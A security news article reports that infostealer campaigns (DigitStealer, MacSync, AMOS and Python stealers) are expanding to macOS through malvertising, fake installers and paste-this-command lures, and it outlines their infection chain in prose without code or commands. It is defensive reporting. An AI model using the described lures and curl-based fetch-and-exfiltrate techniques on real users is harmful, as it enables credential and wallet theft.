Infostealer campaigns that once focused mainly on Windows are now expanding aggressively to macOS, using Python and trusted platforms to reach new victims.
Recent attacks show a clear shift: threat actors are abusing online ads, fake apps, and familiar tools to quietly steal credentials, session cookies, and cryptocurrency data from Mac users.
Cross‑platform Python stealers and macOS‑specific families like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) are at the center of this surge, turning everyday browsing and software installs into high‑risk events for consumers and businesses alike.
These campaigns rely heavily on social engineering to bypass users’ trust.
Malvertising and search‑engine‑poisoned links lead to fake installers or “system fix” utilities that appear legitimate, often wrapped in DMG images or seemingly harmless scripts.
Once executed, the payloads quickly move to harvest browser passwords, keychain entries, crypto wallets, and developer secrets.
For organizations, the theft of cloud credentials and source‑code access can open the door to deeper compromise, including supply chain attacks and ransomware.
Microsoft researchers noted that recent infostealer waves blend macOS‑native techniques with flexible Python tooling to operate across multiple environments.
On macOS, the malware leans on built‑in utilities and AppleScript automation to keep a low profile, while Python stealers are delivered widely through phishing emails and booby‑trapped attachments in corporate networks.
At the same time, attackers are weaponizing trusted platforms such as WhatsApp and fake PDF tools to push stealer payloads, making malicious traffic harder to distinguish from normal activity.
Infection mechanism: from lure to silent data theft
The infection chain typically begins with a lure that looks routine to the victim.
For macOS campaigns, users are steered to spoofed download pages for tools such as DynamicLake or fake AI utilities, or tricked into copy‑pasting Terminal commands that supposedly fix browser or system issues.
When the user runs the installer or command, the malware uses native components like curl, base64 decoding, and gunzip to fetch and unpack additional payloads directly into memory, avoiding obvious file drops.
Scripts executed via osascript or JavaScript for Automation then enumerate the system, query browsers and keychains, and stage stolen data in temporary archives.
Finally, the infostealer exfiltrates these archives to attacker‑controlled domains or command‑and‑control servers using HTTPS POST requests, often over newly registered or low‑reputation infrastructure, completing the compromise with few visible signs to the user.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
